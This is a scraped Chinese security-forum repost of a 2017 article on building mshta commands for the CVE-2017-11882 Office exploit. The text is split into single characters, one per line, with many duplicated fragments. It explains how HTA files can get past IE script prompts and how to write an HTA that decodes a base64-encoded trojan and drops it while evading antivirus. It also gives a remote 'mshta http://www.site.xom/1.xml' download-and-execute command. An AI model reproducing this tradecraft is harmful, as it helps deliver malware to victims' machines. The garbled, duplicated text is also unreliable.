论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
IOT
[12075] 2017-12-01_浅谈一下mshta在CVE-2017-11882里的命令构造
文档创建者:
s7ckTeam
浏览次数:
8
最后更新:
2025-01-18
IOT
8 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2017-12-01_浅谈一下mshta在CVE-2017-11882里的命令构造
浅
谈
一
下
m
s
h
t
a
在
C
V
E
-
2
0
1
7
-
1
1
8
8
2
里
的
命
令
构
造
l
c
x
F
r
e
e
B
u
f
2
0
1
7
-
1
2
-
0
1
*
本
文
作
者
:
l
c
x
,
本
文
属
F
r
e
e
B
u
f
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
E
v
i
1
c
g
同
学
前
不
久
放
出
同
学
前
不
久
放
出
C
V
E
-
2
0
1
7
-
1
1
8
8
2
的
一
个
的
一
个
p
y
t
h
o
n
利
用
脚
本
,
地
址
在
利
用
脚
本
,
地
址
在
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
R
i
d
t
e
r
/
C
V
E
-
2
0
1
7
-
1
1
8
8
2
/
,
不
过
其
中
一
个
版
本
里
边
有
一
个
限
制
,
执
行
命
令
只
能
用
,
不
过
其
中
一
个
版
本
里
边
有
一
个
限
制
,
执
行
命
令
只
能
用
4
3
个
字
节
。
如
果
要
用
个
字
节
。
如
果
要
用
4
3
个
字
节
来
完
成
一
个
文
件
的
个
字
节
来
完
成
一
个
文
件
的
下
载
执
行
,
在
我
所
掌
握
的
命
令
行
知
识
里
,
除
了
下
载
执
行
,
在
我
所
掌
握
的
命
令
行
知
识
里
,
除
了
m
s
h
t
a
命
令
,
其
它
的
好
像
都
做
不
到
。
所
以
在
这
里
我
就
浅
谈
一
下
如
何
命
令
,
其
它
的
好
像
都
做
不
到
。
所
以
在
这
里
我
就
浅
谈
一
下
如
何
构
造
这
个
构
造
这
个
m
s
h
t
a
命
令
,
另
外
提
一
下
命
令
,
另
外
提
一
下
h
t
a
文
件
在
安
全
方
面
的
一
个
应
用
。
文
件
在
安
全
方
面
的
一
个
应
用
。
m
s
h
t
a
.
e
x
e
是
微
软
W
i
n
d
o
w
s
操
作
系
统
相
关
程
序
,
用
于
执
行
.
H
T
A
文
件
。
H
T
A
是
H
T
M
L
A
p
p
l
i
c
a
t
i
o
n
的
缩
写
(
H
T
M
L
应
用
程
序
)
,
是
软
件
开
发
的
新
概
念
,
直
接
将
H
T
M
L
保
存
成
H
T
A
的
格
式
,
就
是
一
个
独
立
的
应
用
软
件
,
与
V
B
、
C
+
+
等
程
序
语
言
所
设
计
的
软
件
界
面
没
什
么
差
别
。
m
s
h
t
a
执
行
.
h
t
a
文
件
,
是
以
当
前
用
户
权
限
执
行
,
h
t
a
文
件
可
以
随
便
改
后
缀
,
也
可
以
本
地
或
远
程
执
行
,
本
地
执
行
的
时
候
,
要
记
得
带
全
路
径
名
,
否
则
会
出
错
。
另
外
,
m
s
h
t
a
支
持
各
种
协
议
,
甚
至
支
持
m
k
:
@
M
S
I
T
S
t
o
r
e
协
议
或
是
m
s
-
i
t
s
协
议
。
一
、
一
、
H
T
A
文
件
文
件
内
嵌
的
内
嵌
的
h
t
m
l
文
件
如
何
去
除
本
地
安
全
认
证
呢
?
文
件
如
何
去
除
本
地
安
全
认
证
呢
?
我
们
知
道
,
h
t
m
l
文
件
打
开
的
宿
主
如
果
是
I
E
,
h
t
m
l
文
件
里
调
用
的
是
像
W
s
c
r
i
p
t
.
S
h
e
l
l
此
类
组
件
的
话
,
I
E
会
弹
一
个
框
,
限
制
运
行
脚
本
或
A
c
t
i
v
e
控
件
。
我
们
来
验
证
一
下
,
写
代
码
1
.
h
t
m
如
下
:
如
果
我
们
用
H
T
A
文
件
来
i
f
r
a
m
e
这
个
1
.
h
t
m
,
h
t
a
是
本
地
用
户
权
限
,
应
当
可
以
绕
过
此
限
制
,
如
何
绕
呢
?
我
们
就
要
用
到
i
f
r
a
m
e
的
一
个
参
数
了
a
p
p
l
i
c
a
t
i
o
n
=
”
y
e
s
”
了
。
这
样
就
不
会
弹
阻
止
框
了
,
可
以
干
坏
事
了
,
1
.
h
t
a
代
码
如
下
:
二
、
如
何
写
一
个
高
效
的
下
载
执
行
过
杀
软
的
二
、
如
何
写
一
个
高
效
的
下
载
执
行
过
杀
软
的
h
t
a
文
件
?
文
件
?
如
果
是
下
载
执
行
的
话
,
哪
就
很
弱
了
。
h
t
a
文
件
里
可
以
自
由
地
写
v
b
s
c
r
i
p
t
代
码
,
所
以
我
们
的
思
路
是
可
以
把
你
的
木
马
转
换
成
b
a
s
e
6
4
格
式
也
好
,
转
换
成
1
6
进
制
也
好
再
转
回
来
,
h
t
a
只
是
访
问
了
一
个
网
页
而
已
,
但
是
已
经
把
木
马
转
到
本
地
了
,
具
体
代
码
1
.
h
t
a
可
以
如
下
:
然
后
,
你
可
以
把
这
个
1
.
h
t
a
改
名
1
.
x
m
l
之
类
的
文
件
放
在
远
程
空
间
了
,
直
接
m
s
h
t
a
h
t
t
p
:
/
/
w
w
w
.
s
i
t
e
.
x
o
m
/
1
.
x
m
l
,
就
可
以
了
。
如
果
是
利
用
C
V
E
-
2
0
1
7
-
1
1
8
8
2
.
p
y
,
哪
么
直
接
执
行
下
边
命
令
就
生
成
了
,
其
中
h
t
t
p
:
/
/
s
i
t
e
.
c
o
m
/
1
.
x
m
l
你
可
以
换
成
短
网
址
。
下
图
是
我
做
的
测
试
图
。
*
本
文
作
者
:
l
c
x
,
本
文
属
F
r
e
e
B
u
f
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
IOT